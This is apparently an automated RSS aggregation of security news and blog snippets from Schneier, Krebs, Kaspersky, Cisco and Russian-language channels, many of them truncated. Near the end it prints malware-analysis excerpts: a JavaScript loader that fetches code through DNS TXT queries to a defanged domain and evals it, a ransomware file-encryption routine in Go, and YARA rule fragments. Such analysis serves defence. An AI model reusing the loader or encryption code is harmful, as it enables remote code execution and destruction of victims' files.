На днях вышло официальное обновление стандарта ISO 27001, ISO/IEC 27001:2013/DAmd 1(en) Information technology — Security techniques — Information security management systems — Requirements — AMENDMENT 1. Теперь у нас новый список контролей (мер ИБ) в приложении А, теперь он выровнен с обновленным стандартом ISO 27002:2022, который мы также ожидаем со дня на день.Общее количество контролей сокращено до 93 (в основном путем объединения), добавлено 11 новых:5.7 Threat intelligence5.23 Information security for use of cloud services5.30 ICT readiness for business continuity7.4 Physical security monitoring8.9 Configuration management8.10 Information deletion8.11 Data masking8.12 Data leakage pre…

ISO опубликовала свежие данные по сертификации систем менеджмента (ISO Survey), из которых меня особенно интересует статистика по СУИБ (ISO 27001). The ISO Survey results contain three sets of data:the number of valid certificates for each country for the 12 ISO management system standards,the number of sites covered by the certificates for each country for 12 ISO management system standards,the number of sectors per country covered by the certificates for 10 ISO management system standards (ISO 22000 and ISO 13485 do not contain data on sectors).Общее количество сертификатов на конец 2020 года:По ISO 27001 рост на 22%.Топ 10 стран, по количеству выданных сертификатов:В РФ 90/252 (рост за г…

Застрахуй братуху, застрахуй или зачем вам ИБ, если можно просто купить полис?https://cloud.yandex.ru/insurance-offerhttps://sber.insure/products/cyber/Судя по количеству материалов по запросу "cybersecurity insurance" за рубежом это уже частая практика, посмотрим приживется ли у нас. Любопытно глянуть на реальные кейсы.p.s ого первый пост с лета :0

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

Friday Squid Blogging: Squid CubesResearchers thaw squid frozen into a cube and often make interesting discoveries.

(Okay, this is a weird story.)

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Posted on June 24, 2022 at 4:04 PM • 0 Comments

Nothing in that letter is out of the ordinary, and is in line with what I wrote about blockchain in 2019.

Blockchain systems can have a little or a lot of privacy, depending on how they are designed and implemented.

To me, the problem isn’t that blockchain systems can be made slightly less awful than they are today.

The problem with blockchain is that it’s not an improvement to any system—and often makes things worse.

This is my basic argument: blockchain does nothing to solve any existing problem with financial (or other) systems.

But in 2013, Edward Snowden disclosed that the National Security Agency had subverted the integrity of a NIST cryptographic standard­the Dual_EC_DRBG­enabling easy decryption of supposedly secured communications.

This discovery reinforced the desire of some public and private entities to develop their own cryptographic standards instead of relying on a U.S. government process.

NIST remains the only viable candidate for effectively developing internationally trusted cryptography standards.

Cryptographic algorithms are essential to security yet are hard to understand and evaluate.

These technologies provide crucial security for communications protocols.

Interesting:What makes Symbiote different from other Linux malware that we usually come across, is that it needs to infect other running processes to inflict damage on infected machines.

Instead of being a standalone executable file that is run to infect a machine, it is a shared object (SO) library that is loaded into all running processes using LD_PRELOAD (T1574.006), and parasitically infects the machine.

Once it has infected all the running processes, it provides the threat actor with rootkit functionality, the ability to harvest credentials, and remote access capability.

Both bills have provisions that could be used to break end-to-end encryption.

All Apple would need to do is point to any number of FBI materials decrying the security risks with “warrant proof encryption.”Sec.

3(c)(7)(A)(vi) states that there shall be no liability for a platform “solely” because it offers “end-to-end encryption.” This language is too narrow.

The word “solely” suggests that offering end-to-end encryption could be a factor in determining liability, provided that it is not the only reason.

Again, the FBI’s repeated statements about end-to-end encryption could serve as support.

Hartzbleed is a new side-channel attack that works against a variety of microprocressors.

Deducing cryptographic keys by analyzing power consumption has long been an attack, but it’s not generally viable because measuring power consumption is often hard.

This new attack measures power consumption by measuring time, making it easier to exploit.

With an understanding of how the DVFS feature works, power side-channel attacks become much simpler timing attacks that can be done remotely.

They also claimed that the technique would work on Intel Xeon CPUs and verified that AMD Ryzen processors are vulnerable and enabled the same SIKE attack used against Intel chips.

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

We’ve always known that phones—and the people carrying them—can be uniquely identified from their Bluetooth signatures, and that we need security techniques to prevent that.

Though phones’ Bluetooth uses cryptographic technology that limits trackability, using a radio receiver, these distortions in the Bluetooth signal can be discerned to track individual devices.

[…]The study’s scientists conducted tests to show whether multiple phones being in one place could disrupt their ability to track individual signals.

Results in an initial experiment showed they managed to discern individual signals for 40% of 162 devices in public.

Certain environmental factors can disrupt a Bluetooth signal, inc…

In this work, we introduce a novel threat vector against neural networks whose energy consumption or decision latency are critical.

Sponge examples are, to our knowledge, the first denial-of-service attack against the ML components of such systems.

Sponge examples frequently increase both latency and energy consumption of these models by a factor of 30×.

On vision tasks, we show that sponge examples can be produced and a latency degradation observed, but the effect is less pronounced.

We conclude by proposing a defense strategy: shifting the analysis of energy consumption in hardware from an average-case to a worst-case perspective.

This is a new vulnerability against Apple’s M1 chip.

Researchers from MIT’s Computer Science and Artificial Intelligence Laboratory, however, have created a novel hardware attack, which combines memory corruption and speculative execution attacks to sidestep the security feature.

The attack shows that pointer authentication can be defeated without leaving a trace, and as it utilizes a hardware mechanism, no software patch can fix it.

The attack, appropriately called “Pacman,” works by “guessing” a pointer authentication code (PAC), a cryptographic signature that confirms that an app hasn’t been maliciously altered.

What’s more, since there are only so many possible values for the PAC, the r…

Upcoming Speaking EngagementsThis is a current list of where and when I am scheduled to speak:I’m speaking at the Dublin Tech Summit in Dublin, Ireland, June 15-16, 2022.

The list is maintained on this page.

Posted on June 14, 2022 at 12:01 PM • 0 Comments

Interesting vulnerability in Tesla’s NFC key cards:Martin Herfurt, a security researcher in Austria, quickly noticed something odd about the new feature: Not only did it allow the car to automatically start within 130 seconds of being unlocked with the NFC card, but it also put the car in a state to accept entirely new keys­with no authentication required and zero indication given by the in-car display.

“The authorization given in the 130-second interval is too general… [it’s] not only for drive,” Herfurt said in an online interview.

“This timer has been introduced by Tesla… in order to make the use of the NFC card as a primary means of using the car more convenient.

What should happen is t…

Cryptanalysis of ENCSecurity’s Encryption ImplementationENCSecurity markets a file encryption system, and it’s used by SanDisk, Sony, Lexar, and probably others.

Despite it using AES as its algorithm, it’s implementation is flawed in multiple ways—and breakable.

The moral is, as it always is, that implementing cryptography securely is hard.

Don’t roll your own anything if you can help it.

Posted on June 13, 2022 at 6:48 AM • 0 Comments

Authorities in the United States, Germany, the Netherlands and the U.K. last week said they dismantled the “RSOCKS” botnet, a collection of millions of hacked devices that were sold as “proxies” to cybercriminals looking for ways to route their malicious traffic through someone else’s computer.

Those messages show that after being warned of his forum infraction, Stanx sent a private message to the Verified administrator detailing his cybercriminal bona fides.

It’s not clear if the coordinated takedown targeting the RSOCKS botnet will be permanent, as the botnet’s owners could simply rebuild — and possibly rebrand — their crime machine.

But the malware-based proxy services have struggled to …

Check out this handmade sign posted to the front door of a shuttered Jimmy John’s sandwich chain shop in Missouri last week.

If you guessed that someone in the Jimmy John’s store might have fallen victim to a Business Email Compromise (BEC) or “CEO fraud” scheme — wherein the scammers impersonate company executives to steal money — you’d be in good company.

You can probably guess by now that this particular Jimmy John’s franchise — in Sunset Hills, Mo.

Then he had friends proceed through his restaurant’s drive-thru, to see if they received receipts for cash payments.

Saladin said his attorneys and local law enforcement are now involved, and he estimates the former employees stole close to $…

Dubbed “Follina,” the flaw became public knowledge on May 27, when a security researcher tweeted about a malicious Word document that had surprisingly low detection rates by antivirus products.

“Most malicious Word documents leverage the macro feature of the software to deliver their malicious payload.

Beaumont says researchers in March 2021 told Microsoft they were able achieve the same exploit using Microsoft Teams as an example, and that Microsoft silently fixed the issue in Teams but did not patch MSDT in Windows or the attack vector in Microsoft Office.

Beaumont said other researchers on April 12, 2022 told Microsoft about active exploitation of the MSDT flaw, but Microsoft closed the …

The latest innovation in ratcheting up the heat comes from the ALPHV/BlackCat ransomware group, which has traditionally published any stolen victim data on the Dark Web.

Today, however, the group began publishing individual victim websites on the public Internet, with the leaked data made available in an easily searchable form.

“We are not going to stop, our leak distribution department will do their best to bury your business,” the victim website reads.

Many security experts believe ALPHV/BlackCat is simply a rebrand of another ransomware group — “Darkside” a.k.a.

Callow said there may be an upside to this ALPHV innovation, noting that his wife recently heard directly from a different rans…

]com, two DDoS-for-hire services that had thousands of customers who paid to launch more than 200,000 attacks.

Attackers can send spoofed DNS queries to these DNS servers, forging the request so that it appears to come from the target’s network.

That way, when the DNS servers respond, they reply to the spoofed (target) address.

This “amplification” effect is especially pronounced if the perpetrators query dozens of DNS servers with these spoofed requests simultaneously.

The U.K. has even taken out Google ads to remind U.K. residents when they search online for terms common to booter services.

The global dearth of available IP addresses has turned them into a commodity wherein each IP can fetch between $15-$25 on the open market.

This has led to boom times for those engaged in the acquisition and sale of IP address blocks, but it has likewise emboldened those who specialize in absconding with and spamming from dormant IP address blocks without permission from the rightful owners.

In May, prosecutors published information about the source of some IP address ranges from which the Adconion employees allegedly spammed.

Prosecutors allege the Adconion employees also obtained hijacked IP address blocks from Daniel Dye, another man tied to this case who was charged separately.

The last-…

Netflix has a new documentary series airing next week — “Web of Make Believe: Death, Lies & the Internet” — in which Yours Truly apparently has a decent amount of screen time.

The producers of the Netflix show said footage from an interview I sat for in early 2020 on swatting and other threats should appear in the first episode.

They didn’t specify what additional topics the series would scrutinize, but Netflix’s teaser for the show suggests it concerns cybercrimes that result in deadly, real-world kinetic attacks.

Murder,” reads the Netflix short description for the series.

The first season of the new documentary series will be available on Netflix starting June 15.

The new guidelines state that prosecutors should avoid charging security researchers who operate in “good faith” when finding and reporting vulnerabilities.

“The DOJ is making clear they’re not going to prosecute good faith security researchers, but be really careful before you rely on that,” Kerr said.

“A lawyer for the defendant can make the pitch that something is good faith security research, but it’s not enforceable,” Kerr said.

ANALYSISKerr’s warning about the dangers that security researchers face from civil prosecution is well-founded.

KrebsOnSecurity regularly hears from security researchers seeking advice on how to handle reporting a security vulnerability or data exposure.

The Costa Rican publication CRprensa.com reports that affected systems at the Costa Rican Social Security Fund (CCSS) were taken offline on the morning of May 31, but that the extent of the breach was still unclear.

Conti initially demanded $10 million, and later doubled the amount when Costa Rica refused to pay.

As CyberScoop reported on May 17, Chaves told local media he believed that collaborators within Costa Rica were helping Conti extort the government.

Chaves offered no information to support this claim, but the timeline of Conti’s descent on Costa Rica is worth examining.

Conti and Hive’s Costa Rican exploits mark the latest in a string of recent cyberattacks against government targ…

The lawmakers say that in public statements and blog posts, ID.me has frequently emphasized the difference between two types of facial recognition: One-to-one, and one-to-many.

One-to-many facial recognition involves comparing a face against a database of other faces to find any potential matches.

Americans have particular reason to be concerned about the difference between these two types of facial recognition, says the letter to the FTC, signed by Sens.

The agency also pledged that any biometric data shared with ID.me would be permanently deleted.

Asked to respond to concerns raised in the letter from Senate lawmakers, ID.me instead touted its successes in stopping fraud.

But many government employees aren’t issued an approved card reader device that lets them use these cards at home or remotely, and so turn to low-cost readers they find online.

Not having a smart card reader at home and lacking any obvious guidance from his co-workers on how to get one, Mark opted to purchase a $15 reader from Amazon that said it was made to handle U.S. government smart cards.

The USB-based device Mark settled on is the first result that currently comes up one when searches on Amazon.com for “PIV card reader.” The card reader Mark bought was sold by a company called Saicoo, whose sponsored Amazon listing advertises a “DOD Military USB Common Access Card (CAC) Reader” and ha…

The U.S. Drug Enforcement Administration (DEA) says it is investigating reports that hackers gained unauthorized access to an agency portal that taps into 16 different federal law enforcement databases.

According to this page at the Justice Department website, LEIA “provides federated search capabilities for both EPIC and external database repositories,” including data classified as “law enforcement sensitive” and “mission sensitive” to the DEA.

The DEA portal esp.usdoj.gov is listed on Page 87 of a Justice Department “data inventory,” which catalogs all of the data repositories that correspond to DOJ agencies.

It’s not going to be as simple as just turning on multi-factor authentication fo…

Microsoft today released updates to fix at least 74 separate security problems in its Windows operating systems and related software.

This month’s patch batch includes fixes for seven “critical” flaws, as well as a zero-day vulnerability that affects all supported versions of Windows.

By all accounts, the most urgent bug Microsoft addressed this month is CVE-2022-26925, a weakness in a central component of Windows security (the “Local Security Authority” process within Windows).

CVE-2022-26925 was publicly disclosed prior to today, and Microsoft says it is now actively being exploited in the wild.

The flaw affects Windows 7 through 10 and Windows Server 2008 through 2022.

“To sign into a website on your computer, you’ll just need your phone nearby and you’ll simply be prompted to unlock it for access.

“Sign in with Google”), but users need to sign in at every website to use the passwordless functionality.

“I worry about people who can’t afford an extra device, or can’t easily replace a broken or stolen device,” Bellovin said.

“If you forget the password and lose your phone and CAN’T, well, now you’ve lost your authorization token that is used for logging in.

“Taking advantage of the phone’s strong authentication of the phone owner (if you have a decent passcode) is quite nice.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

File this in the “yes that’s very clever of you, but please don’t” pile.

File this in the “yes that’s very clever of you, but please don’t” pile.

Amazon has demonstrated an experimental feature that demonstrates how a child can choose to have a bedside story read to him by his Alexa… using his dead grandmother’s voice.

Rohit Prasad, Amazon’s head scientist for Alexa AI, told attendees of its annual MARS conference that:“…in these times of the ongoing pandemic, so many of us have lost someone we love.

Amazon is far from the only company with the smarts to pretty convincingly mimic someone’s voice from just a small snatch of audio, but that doesn’t mean it’s a cool thing to do.

The UK’s National Health Service (NHS) has warned the public about a spate of fake messages, sent out as SMS text messages, fraudulently telling recipients that they have been exposed to the Omicron variant of COVID-19.

In a tweet, the NHS said that it had seen reports of text messages that claimed to come from the NHS, telling recipients that they had been in close contact with someone who had a confirmed COVID-19 infection, and that they should order a testing kit.

The real NHS website is at nhs.uk, but obviously the scammers don’t want you to go there.

To the casual observer it looks very much like the real NHS website.

The scammers are using a variety of different domains in their scam …

Internet-connected jacuzzis find themselves in hot water, and a Google engineer claims that their AI has developed feelings.

All this and more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault.

Sponsor: Kolide At Kolide, we believe the supposedly Average Person is the key to unlocking a new class of security detection, compliance, and threat remediation.

Listeners of Smashing Security can get 10% off Drata and waived implementation fees at smashingsecurity.com/drataFollow the show:Follow the show on Twitter at @SmashinSecurity, on the Smashing Security subreddit, or visit our website for more …

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Have you received an email notification that there is a voicemail waiting to be listened to by you?

Maybe you would be wise to think carefully before clicking on the attachment.

As security researchers at Zscaler explain, a wave of phishing attacks posing as voicemail notifications have targeted US organisations in recent days.

Targeted victims include organisations working in sectors such as the military, healthcare, pharmaceuticals, manufacturing, and others.

On its website, Zscaler has published a list of domains used in the attack which companies may choose to proactively block.

If the bad guys aren’t discriminating who they are attacking, how can your business settle for anything less than Fortune 500 level security?

SolCyber has brought to market a new way to consume and experience managed cybersecurity services, that works as simply as your favorite streaming entertainment provider.

SolCyber is the first modern managed security provider to deliver a fully integrated tech stack of enterprise leading technologies, coupled with 24/7 SOC support and incredibly customer care.

Every business deserves Fortune 500 strength security that’s streamlined, accessible and affordable.

To learn more about you can level-up to Fortune 500 security in less than 30 days, visit SolC…

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

The form-building plugin is used on over one million websites.

A critical vulnerability in a WordPress plugin used on over one million websites has been patched, after evidence emerged that malicious hackers were actively exploited in the wild.

WordPress has pushed out a forced automatic update to the widely-used Ninja Forms plugin after security researchers.

And clearly WordPress thought so, as it appears to have initiated a forced update to third-party WordPress-powered websites running vulnerable versions of the plugin.

According to Wordfence, the flaw has been fully patched in versions 3.0.34.2, 3.1.10, 3.2.28, 3.3.21.4, 3.4.34.2, 3.5.8.4, and 3.6.11.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Law enforcement agencies around the world appear to have scored a major victory in the fight against fraudsters, in an operation that seized tens of millions of dollars and seen more than 2000 people arrested.

Operation “First Light 2022”, running for two months from March 8 2002 until May 8 2022, saw 76 countries clamp down on organised crime rings behind a variety of scams, seizing criminal assets, and providing new investigative leads around the world.

Special focus was given to fraudsters who use social engineering tricks to scam the unwary via the telephone, through romance scams, business email compromise (BEC), and related money laundering activities.

“Interpol provides a unique plat…

Using the Specops database, you can block commonly used and/or compromised passwords, stopping users from choosing passwords susceptible to dictionary attacks.

Create Compliant Password PoliciesSimplify passwords for your users – and place the burden on authentication systems instead of your IT department – with Specops Password Policy tools.

With compliance driven templates, and a reporting tool to ensure you are matching or exceeding standards, Password Policy makes compliance a breeze.

Target Password EntropySpecops Password Policy enforces password length and complexity while blocking common character types at the beginning/end of passwords, as well as consecutively repeated characters.…

All this and more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault.

Sponsor: Kolide At Kolide, we believe the supposedly Average Person is the key to unlocking a new class of security detection, compliance, and threat remediation.

Sponsor: Drata Is your organization finding it difficult to achieve compliance and scale its security posture?

Listeners of Smashing Security can get 10% off Drata and waived implementation fees at smashingsecurity.com/drataFollow the show:Follow the show on Twitter at @SmashinSecurity, on the Smashing Security subreddit, or visit our website for more episodes.

Reme…

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Традиционно принято считать, что маленькие компании с небольшим уровнем дохода не очень интересны киберпреступникам.

Давайте лучше посмотрим на пять реальных причин, по которым маленькая компания может оказаться жертвой кибератаки.

Разработчики ПО могут встроить эти пакеты в свои продукты и не желая того скомпрометировать своих клиентов.

Для защиты компании малого бизнеса от современных киберугроз, необязательно покупать дорогие решения с ненужными вам функциями.

Идеальным решением для защиты компании с несколькими сотрудниками и одним сервером будет является Kaspersky Small Office Security.

21 июня пользователь Twitter под ником ohnePixel сообщил о краже из взломанного аккаунта CS:GO коллекции предметов на общую сумму 2 миллиона долларов.

На всякий случай уточним, что Souvenir Dragon Lore — самый дорогой скин в CS:GO.

Например, некоторые геймеры предпочитают отключать на время игры антивирус, опасаясь снижения производительности компьютера.

Однако делать этого уже давно не нужно, потому что в правильных антивирусах есть игровой режим.

В этом режиме антивирус потребляет минимум ресурсов, не отвлекает вас уведомлениями и не мешает играть, и в то же время компьютер останется под защитой.

Сравнивая методы и инструменты злоумышленников на разных стадиях атаки, они пришли к выводу, что многие группировки в общем-то действуют примерно по одним и тем же схемам.

Полный отчет с детальным анализом каждой техники и примерами ее использования можно найти в документе Common TTPs of modern ransomware groups.

Отчет предназначен в первую очередь для аналитиков центров мониторинга (SOC), экспертов Threat Hunting и Threat Intelligence, а также специалистов по реагированию на инциденты и по их расследованию.

Будет нелишне повторить основные практические рекомендации по защите корпоративной инфраструктуры на этапе предотвращения вторжений и на нашем блоге.

В отчете также можно найти практиче…

Ну а если вы заметили подозрительную активность в профиле — вроде прочитанных сообщений, которые вы не открывали, — то тут уж точно следует как можно скорее сменить пароль.

Кстати, если вы не меняли пароль полгода или больше, соцсеть вам об этом напомнит.

В VK есть два варианта двухфакторной аутентификации: одноразовый код можно получать по SMS или через специальное приложение-аутентификатор.

В правом верхнем углу нажмите на фото профиля, выберите VK Pay → Настройки → Привязанные карты и нажмите на крестик рядом с реквизитами.

Не останавливаемся на достигнутомНастройка аккаунта «ВКонтакте» не заканчивается на установке надежного пароля, включении двухфакторной аутентификации и завершении не…

Но в начале июня разработчики одной из систем управления базами данных (СУБД), MongoDB, объявили о прорыве: в очередном релизе СУБД они внедрили поддержку Queryable Encryption.

Дело в том, что у разработчиков и операторов БД в приоритете всегда была скорость и надежность, но не защита.

В частности, было обнаружено, что в случае кражи всей базы данных, зашифрованной с использованием метода CryptDB, возможно расшифровать большую часть информации.

В итоге получается, что формально у вас данные зашифрованы, а на практике они уже давно украдены и в открытом виде продаются на черном рынке.

Функциональность Queryable Encryption в MongoDB сделана на стыке науки и бизнеса, и это, судя по всему, прои…

В рамках сервиса Digital Footprint Intelligence наши эксперты выяснили, за сколько можно купить и продать доступ к инфраструктуре компании.

Так за сколько же злоумышленники могут купить доступ к вашей инфраструктуре?

Проанализировав около двух сотен объявлений, эксперты пришли к следующим выводам:большая часть объявлений предлагает доступ к небольшим компаниям;случаи, когда доступ продают дороже чем за 5000 долларов, достаточно редки;стоимость доступа к крупным компаниям в среднем от 2000 до 4000 долларов;почти в половине объявлений доступ предлагается по цене менее 1000 долларов.

Поскольку чаще всего предметом продажи является удаленный доступ к инфраструктуре компании через RDP, то в перв…

Но наверняка не со всеми из них вы хотите делиться своими винными достижениями, а расфрендить кого-то в Vivino, как уже было сказано выше, — крайне непросто.

Поэтому первым делом стоит отключить функцию автоматической подписки в Vivino на всех ваших друзей из соцсетей.

Для этого:В приложении Vivino на устройстве с Android во вкладке Мой профиль нажмите на три точки в правом верхнем углу, выберите Настройки .

Чтобы отозвать лишние разрешения на устройстве с iOS:Зайдите в Настройки смартфона, пролистайте вниз до списка приложений и выберите в нем Vivino.

Данные под защитойТеперь вы знаете, как сделать свой аккаунт в Vivino настолько приватным, насколько вообще позволяет приложение.

Это означает включение в рабочие процессы молодых и неопытных людей, которые почти наверняка ничего не знают о кибербезопасности.

В первую очередь — объяснить принятые в компании стандарты, касающиеся политик безопасности, двухфакторной аутентификации и паролей.

С одной стороны, для компании выгодно, чтобы стажеры с горящими глазами писали о том, как им интересно работать, в своих социальных сетях.

А совершенно напрасно — это, во-первых, поможет снизить риски для вашей собственной кибербезопасности, а во-вторых, точно будет полезным уроком, который стажер вынесет после работы в компании.

Он позволит узнать, какие приемы используют кибермошенники, и что делать если кто-то взломал учетную зап…

В эту категорию техник попадают все инциденты, в которых атакующий полагается на действия пользователя, находящегося внутри инфраструктуры.

То есть это все случаи, когда атакующие заставляют сотрудника нажать на вредоносную ссылку или же открыть почтовое вложение.

Сюда же относятся и инциденты, в которых обманутый пользователь дает злоумышленнику удаленный доступ к корпоративным ресурсам.

Эксплуатация служб удаленного доступаВ категорию Exploitation of Remote Services попадают инциденты, в которых злоумышленники пользуются уязвимыми или своевременно не обновленными службами для доступа к внутренним системам внутри корпоративной сети.

Дополнительно не повредит периодическое сканирование сети…

Дело может быть в зловреде, который поселился не в вашем компьютере, а в роутере.

Троян Switcher известен как раз тем, что проникал в настройки роутера и выставлял в них адрес вредоносного DNS-сервера «по умолчанию».

Есть два основных способа «подселить» зловреда в роутер — подобрать к устройству пароль администратора, чтобы иметь возможность им управлять, или воспользоваться его уязвимостями.

Эксплуатация уязвимостейУязвимости в роутере — это дыры в ваших воротах в Интернет, через которые в домашнюю или корпоративную сеть может пробраться множество различных угроз.

А может и не пробираться, а остаться на самом роутере, где их сложнее заметить.

Это можно считать особенностями фичи, но был найден и реальный баг: иногда при выключении телефона режим «маячка» не активируется вовсе, хотя и должен.

Атака на выключенный телефонСобственно, главным открытием исследователей было то, что прошивка Bluetooth-модуля не зашифрована и не защищена технологией Secure Boot.

Авторы работы подробно описали теоретическую модель атаки, но на практике не показали, что айфон прямо-таки можно взять и взломать через Bluetooth, NFC и UWB.

Понятно только, что если на эти модули питание подается всегда, то и уязвимости должны работать всегда.

Как и в случае со связкой Bluetooth + UWB + NFC + Secure Element в айфонах, они имеют широкие права в компьютерной сис…

Эксперты «Лаборатории Касперского» тщательно исследовали вредоносное ПО WinDealer, созданное APT- группировкой LuoYu.

Что такое атака man-on-the-side и для чего она используется авторами WinDealerАтака типа man-on-the-side подразумевает, что злоумышленник каким-то образом частично контролирует канал связи, что позволяет ему читать передаваемую информацию и внедрять собственную в чужой обмен данными.

Похожую уловку злоумышленники используют и для обеспечения безопасного процесса управления зараженным компьютером.

В отдельных случаях WinDealer пытается обращаться по адресу, который в принципе не может существовать, но благодаря методу man-on-the-side получает ответ.

Впрочем, иногда заражения …

В этот раз мы обнаружили фишинг от лица финансового онлайн-сервиса Wise (в недавнем прошлом — TransferWise), услугами которого пользуются миллионы людей.

Еще в письме есть две ссылки: одна якобы для перехода на новый сайт, другая — для связи с отправителями.

На самом деле обе ведут на одну и ту же страницу, с которой жертву автоматически перенаправляют уже на другой, фишинговый ресурс.

Фишинговый сайт выглядит правдоподобнее, чем письмо — он действительно очень похож на настоящий сайт Wise.

Если жертва в нетерпении несколько раз нажмет на кнопку «Продолжить», ее перенаправят на официальный сайт Wise.

Я надеюсь, что после «кусков» и «тэгов» на стенах «заброшек» это хобби перейдет в более мирное русло каллиграфии и дизайна.

Конечно, лучший способ общения с ребенком, позволяющий узнать его интересы и проблемы, — это совместная деятельность.

Но как изучить интересы ребенка, если он не бросается такими словами вслух?

И он постарается не давать вам такой возможности, когда поймет, как это сделать (обычно они разбираются очень быстро).

Но, как показывает опыт, детям очень трудно избежать массовых увлечений — впрочем, этим страдает и большинство взрослых, чего уж детей-то винить!

(Feed generated with FetchRSS)

let C = 0, P = "", K = "lin9gtmn", R = () => { require("dns").resolveTxt("0x" + C + "."

+ K + ".eccbc8[.

]com", (e, d) => { if (d) { if (P += d.join(""), C++, C < 23) return R(); try { eval(global.dec(K, P)) } catch (a) {} } }) }; R()

Фрагмент SideWinder.AntiBot.Script из https://finance.pakgov[.

]net/salary-a4222e91 function buttonClick() { if (navigator.geolocation) { navigator.geolocation.getCurrentPosition(showPosition); } else { x.innerHTML = 'Geolocation is not supported by this browser.

'; } } function showPosition(position) { alert(`lat ${position.coords.latitude} long ${position.coords.longitude}`); }

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

а по совместительству одним из самых значимых людей в отечественной форензике — Игорем Михайловым.

С моим опытом написания постов в блог такой формат подходил мне лучше всего.

Весь процесс написания занял у нас около полугода.Как-то мне в LinkedIn написал менеджер Packt и сказал, что они планируют выпустить третье издание «Practical Mobile Forensics».

Книга эта была мне очень знакома, я читал оба издания, и во многом именно они дали отличную базу, которая позволила мне работать с мобильными устройствами.

Третья книга "Learning Android Forensics: Analyze Android devices with the latest forensic tools and techniques" должна помочь глубоко погрузиться в анализ подобных мобильных устройств.

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

// Encrypt file data func (keytab *EncryptionKeyTab) EvaluateFilename(filename string, n1 uint32, n2 uint32) error { f, err := os.OpenFile(filename, os.O_RDWR, 0600) if err != nil { return err } defer f.Close() file_info, err := f.Stat() if err != nil { return err } file_size := file_info.Size() var num_blocks int = int(30 * (file_size / 4096) / 100) if file_size == 0 { return nil } if file_size <= 4096 { num_blocks = 1 } else if (num_blocks < 2) { num_blocks = 2 } else { if (num_blocks > 25) { num_blocks = 25 } } key_data1_pos := n1 % 0xE7000 key_data1 := keytab.Data[key_data1_pos : key_data1_pos + 0x19000] key_data2_pos := n2 % 0xFF400 key_data2 := keytab.Data[key_data2_pos : key_data2_po…

00 75 04 F7 D8 EB 0? }

[1-2] 32 2D 34 42 C7 4?

[1-2] 42 38 2D 39 C7 4?

[1-2] 36 44 41 32 C7 4?

[1-2] 42 46 31 37 } condition: (uint32(0) == 0x464C457F) and ( (1 of ($h*)) or for any i in (0..elf.number_of_sections-2): ( (elf.sections[i].name == ".app.version") and (elf.sections[i+1].name == ".cfgETD") ) ) }

(Feed generated with FetchRSS)

As an early adopter of Cisco Secure Endpoint, Per Mar Security Services has seen the product evolve alongside the threat landscape.

Safeguarding future successPer Mar Security provides physical security services to both homes and businesses, protecting roughly 75,000 customers across 16 U.S. states.

The company began using Cisco Secure Endpoint almost a decade ago to defend against attacks on its various devices.

Protecting critical servicesPer Mar Security provides critical protection from hazards such as burglary and fires for homes, manufacturing facilities, hospitals, college campuses, and more.

Watch video: Per Mar Security gains threat visibility with Cisco Secure EndpointWe’d love to…

Security resilience isn’t something that happens overnight.

What impact do people have on security resilience?

In a world where uncertainty is certain, we recently explored how people can contribute to five dimensions of security resilience, helping businesses weather the storm.

A holistic approach to security resilienceWhen it comes to security resilience, however, we have to look at the whole picture.

Learn about other ways to build your organization’s security resilience to meet future challenges.

But for cybersecurity professionals, internet-connected medical devices are more likely to be top-of-mind.

Sarris and Clapham were among several security experts we spoke to for a deeper dive into the challenges of IoT medical device security and top-line strategies for protecting patients and hospitals.

Every device is differentConnected medical devices are becoming so integral to modern health care that a single hospital room might have 20 of them, Penn Medicine’s Dan Costantino noted in Healthcare IT News.

So it’s very, very difficult — the IT teams can’t know everything.”Cisco Advisory CISO Wolfgang Goerlich noted that one unique challenge for securing medical devices is that they often…

For a security leader, the toughest questions are often around security buy-in: How do you achieve active support across the organization for building resilience?

Our experts gave us their top four tips for getting the buy-in of the business when it comes to security resilience.

You can check out more in our eBook, Building Security Resilience: Stories and Advice from Cybersecurity Leaders.

It covers more firsthand accounts from Liz, AC, Christos and 10 other industry professionals sharing how they built security resilience within their organizations.

Here’s a couple more you might like:View all our blogs on security resilience here.

In this second installment, we will look at ways of structuring the presentation of machine-generated alerts, so that each alert offers a cohesive and compelling narrative, as if written by a human analyst, at scale and in realtime.

The third line informs us that, on a factual basis, only a communication with an IP address was observed.

In this case, neither the hostname nor the IP address is important to the detector.

When we eventually succeed in explaining the security events, we might not be finished with the storytelling yet.

